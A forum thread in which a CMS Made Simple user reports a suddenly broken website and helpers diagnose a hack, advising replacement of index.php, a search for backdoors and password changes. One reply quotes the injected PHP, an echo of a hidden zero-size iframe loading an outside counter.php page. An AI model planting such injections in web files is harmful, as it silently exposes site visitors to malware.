[solved] website broke down without anyone touching

[rgielen]

Hello everyone,

I am running a website using CMS MS 1.10.2. I don't know what php and mysql version the webserver is running, but I could find out if that would prove to be necessary.

I have had this website (http://www.nmpc12.tue.nl) up and running for several months now and when I checked this morning it had stopped functioning and I got the following error:

"error) { echo $error; } } if( $page == '__CMS_PREVIEW_PAGE__' && isset($_SESSION['cms_preview']) ) // temporary { unset($_SESSION['cms_preview']); } # vim:ts=4 sw=4 noet #c3284d# echo " "; #/c3284d# ?> "

I can still log onto the admin page and there nothing has changed. It is just no longer displaying the webpage when you browse to the url. Also, I downloaded the admin log and no changes have been made apart from some automated things for which no details are given in the log other than "PruneAdminlogTask". These appear to be the only changes that have been made since I last checked the website. Also, the ftp fileserver is still functioning properly and a different website I am running on the same webserver with the same CMS MS version is not experiencing the same problem.

Any ideas? I tried googling the problem and browsing the forum but couldn't find it, sorry if its hidden in the topics somewhere.

[Jo Morg]

We do need more data.
But just by looking at the source of the error page one thing stands out:

Code: Select all

error)
	{
		echo $error;
	}
}

if( $page == '__CMS_PREVIEW_PAGE__' && isset($_SESSION['cms_preview']) ) // temporary
  {
    unset($_SESSION['cms_preview']);
  }

# vim:ts=4 sw=4 noet

#c3284d#
echo "<__script__ type=\"text/javascript\">
document.write('<__iframe src=\"http://rcz.nu/counter.php\" border=\"0\" width=\"0\" height=\"0\"></__iframe>');
</__script>
";

#/c3284d#
?>

I may be wrong but it does seem like a hack.
But as I said more info would help. And, if you can login on the admin panel, check the admin logs for errors.

[rgielen]

Thanks you for your help Jo Morg.

I am not sure what kind of extra information you are refering to. Also do you mean that it looks like the website was hacked? Just let me know what kind of information you would like and I'll post it on the forum.

The admin log reads as follows:
09/10/12 13:06:55 -1 Automated Task Succeeded GatherNotificationsTask
09/10/12 11:10:11 nmpc12 -1 Core CMSMS version 1.11.1 is available
09/10/12 11:10:11 nmpc12 -1 Global Settings Edited
09/10/12 11:08:43 nmpc12 71 Content Item: Monday, August 27 Deleted
09/10/12 10:43:59 nmpc12 -1 Page Defaults Edited
09/10/12 10:42:59 nmpc12 1 Admin Username: nmpc12 Logged In
09/10/12 10:42:54 -1 Automated Task Succeeded GatherNotificationsTask
...** MORE OF THE SAME AUTOMATED TASKS...
08/20/12 22:47:31 -1 Automated Task Succeeded PruneAdminlogTask

[rgielen]

Thanks for helping out Jo Morg.

I do not quite know what kind of additional information you would need, you mean mysql version information etc? At the very least I know for sure it is not an old version, the same for php.

The admin log does not show anything out of the ordinary. No errors whatsoever.

By a hack you mean someone hacked the website and edited some stuff, would that be hard to fix?

[uniqu3]

with more info JoMorg is refering to is for example if you read http://forum.cmsmadesimple.org/viewtopi ... =40&t=2661

Your System information like CMSMS Version, Modules in use and so on would already help.

By hack it is meant that somone has compromised either you FTP, ControlPanel, DB, CMS credentials and was able to edit/change files on your Server.

As first step it would help to replace index.php in your folder where CMSMS is installed with orginial (for example download same Version that is currently installed from http://dev.cmsmadesimple.org/project/files/6 and upload index.php after you unpack downloaded package)

But usually there are backdors so you would be advised to have a good look at your webserver for any files that shouldn't be there.
For CMSMS you could use a diff file but anything else, well cant answer to that.

Also after you were able to clean everything up, you should change all passwords like FTP users, ControlPanel, Databse (also change config.php after that accordingly), CMSMS backend user passwords...

[Jo Morg]

I do not quite know what kind of additional information you would need, you mean mysql version information etc?

On the Admin panel you have System Information where there is a link (IIRC) to format it to post on the forum.

Also do you mean that it looks like the website was hacked?

... hah! uniqu3 beat me to it !

[rgielen]

Wow you guys are brilliant . I replaced the index.php file and now the website is operational again. Thank you very much for your quick and kind assistance. I will change the passwords etc today.

Also, I copied the information you mentioned. Could you please tell me if you spot something that is likely to cause problems?

--------------------------------------------

Cms Version: 1.10.2

Installed Modules:

•CMSMailer: 2.0.2
•CMSPrinting: 1.0
•FileManager: 1.2.0
•MenuManager: 1.7.7
•MicroTiny: 1.1.1
•ModuleManager: 1.5.3
•News: 2.12.3
•Search: 1.7
•ThemeManager: 1.1.4


Config Information:

•php_memory_limit:
•process_whole_template: false
•output_compression: false
•max_upload_size: 10000000
•default_upload_permission: 664
•url_rewriting: none
•page_extension:
•query_var: page
•image_manipulation_prog: GD
•auto_alias_content: true
•locale:
•default_encoding: utf-8
•admin_encoding: utf-8
•set_names: true


Php Information:

•phpversion: 5.2.6-1+lenny13
•md5_function: On (True)
•gd_version: 2
•tempnam_function: On (True)
•magic_quotes_runtime: Off (False)
•E_STRICT: 0
•memory_limit: 128M
•max_execution_time: 30
•output_buffering: On
•safe_mode: Off (False)
•file_uploads: On (True)
•post_max_size: 8M
•upload_max_filesize: 10M
•session_save_path: /var/lib/php5 (1733)
•session_use_cookies: On (True)
•xml_function: On (True)


Server Information:

•Server Api: cgi-fcgi
•Server Db Type: MySQL (mysql)
•Server Db Version: 5.0.51a


----------------------------------------------

[Rolf]

Welcome rgielen,

Perhaps a good read (in Dutch) http://forum.cmsmadesimple.org/viewtopi ... 52&t=45525

grt. Rolf